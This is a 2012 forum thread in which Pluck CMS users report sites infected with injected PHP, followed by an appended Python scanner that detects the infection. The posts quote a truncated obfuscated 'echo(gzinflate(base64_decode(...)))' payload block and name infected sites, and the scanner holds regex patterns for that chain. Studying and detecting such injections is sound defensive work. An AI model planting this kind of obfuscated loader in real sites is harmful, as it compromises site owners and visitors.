
pluck support forums

for all your questions about the easiest CMS on the planet


#1 14-03-2012 13:12:13

topcat2005
Member
Registered: 08-06-2011
Posts: 20

Pluck sites getting hacked

Eight Pluck websites are hacked.

It is with Pluck 4.6 and 4.7.

In the index.php they put the following script:

#1b841a#
echo(gzinflate(base64_decode("3VZLb5tAEP4rrS9ALBN2YXmIbC+tKvXcU2X5gAzEIAdsII1iK/+9Ozu7GDuxTaIeqko2gmFmvnl9w961y6bYdF9S/i3psjjlVfb0KTWtuMjN1L7Puu+P6/WvLGlMi3PqEGqt+GyTNG32o............8=")));
#/1b841a#

In the login.php they put the following similar script:

#1b841a#
echo(gzinflate(base64_decode("3VZLb5tAEP4rrS9ALBN2YXmIbC+tKvXcU2X5gAzEIAdsII1iK/+9Ozu7GDuxTaIeqko2gmFmvnl9w961y6bYdF............MrRXf3aqj7h8=")));
#/1b841a#


How to prevent this?

Some sites are now hacked for the second or third time.

Last edited by topcat2005 (14-03-2012 13:12:30)

Offline

#2 14-03-2012 21:36:32

Spirit55555
developer
From: Denmark
Registered: 09-11-2008
Posts: 227
Website

Re: Pluck sites getting hacked

First of all, 4.6 is NOT supported anymore. But 4.7 is.

Could you post some links to the sites that are affected by this? It's really hard to fix otherwise.

Offline

#3 14-03-2012 23:16:26

topcat2005
Member
Registered: 08-06-2011
Posts: 20

Re: Pluck sites getting hacked

These two sites I have removed the script from:
http://www.dozybv.nl
http://www.ledssafety.nl

These two sites have the script:
http://www.pannenlegger-tromp.nl
http://www.fight4fit.nl

They are all 4.7.

Offline

#4 28-03-2012 08:44:00

topcat2005
Member
Registered: 08-06-2011
Posts: 20

Re: Pluck sites getting hacked

http://www.dozybv.nl/index.rar This is a hacked index.php from dozybv.nl; perhaps you can do something with this.

Offline

#5 30-03-2012 05:31:03

topcat2005
Member
Registered: 08-06-2011
Posts: 20

Re: Pluck sites getting hacked

In the albums module 1.xx.jpg.php, xx.jpg and the thumb folder have the file permissions 777 (owner, group and public can read, write and execute).
Is this a default and is this right?

Offline

#6 02-04-2012 12:05:52

a_bach
developer/module guru
From: Poland
Registered: 24-11-2008
Posts: 439
Website

Re: Pluck sites getting hacked

topcat2005 wrote:

http://www.dozybv.nl/index.rar This is a hacked index.php from dozybv.nl; perhaps you can do something with this.

The simplest way is to protect (chmod) index.php as read-only.

Offline

#7 08-04-2012 16:39:01

topcat2005
Member
Registered: 08-06-2011
Posts: 20

Re: Pluck sites getting hacked

Till now no more malware on the site.

Offline
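
A defender-side check for the symptoms reported in this thread (the `#1b841a#` marker block, the `echo(gzinflate(base64_decode(` line, `.jpg.php` file names and 777 permissions), as an added example that is not part of the original posts or of Pluck itself. Matching any six-hex-digit marker tag, and all function and finding names, are assumptions; the sample files are constructed.

```python
import re
import stat
import tempfile
from pathlib import Path

# Paired marker comments as in the posts (#1b841a# ... #/1b841a#).
# Assumption: the tag may differ per infection, so any 6 hex digits match.
MARKER = re.compile(rb"#([0-9a-f]{6})#.*?#/\1#", re.S)
# Decode-and-output chain used by the injected line.
CHAIN = re.compile(rb"(echo|eval)\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(", re.I)
# Image name followed by .php, like the xx.jpg.php file mentioned in post #5.
DOUBLE_EXT = re.compile(r"\.(jpe?g|png|gif)\.php$", re.I)


def scan(root):
    """Return sorted (relative path, finding) pairs for a web root."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        rel = path.relative_to(root).as_posix()
        mode = path.lstat().st_mode
        if not stat.S_ISLNK(mode) and mode & stat.S_IWOTH:
            findings.append((rel, "world-writable"))
        if not stat.S_ISREG(mode):
            continue
        if DOUBLE_EXT.search(path.name):
            findings.append((rel, "double-extension"))
        if path.suffix.lower() == ".php":
            data = path.read_bytes()
            if MARKER.search(data):
                findings.append((rel, "marker-block"))
            if CHAIN.search(data):
                findings.append((rel, "decode-chain"))
    return sorted(findings)


def demo():
    """Scan a constructed web root built in a temporary directory."""
    samples = {  # constructed sample files, not real site content
        "index.php": (0o644, b'<?php\n#1b841a#\necho(gzinflate(base64_decode("QUJD")));\n#/1b841a#\n'),
        "login.php": (0o644, b"<?php echo 'login'; ?>\n"),
        "thumb.jpg.php": (0o777, b"<?php ?>\n"),
    }
    with tempfile.TemporaryDirectory() as root:
        for name, (mode, body) in samples.items():
            path = Path(root, name)
            path.write_bytes(body)
            path.chmod(mode)
        return scan(root)
```

Run `scan()` against the site's document root and compare every flagged file with a clean copy from the Pluck release archive before restoring it.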
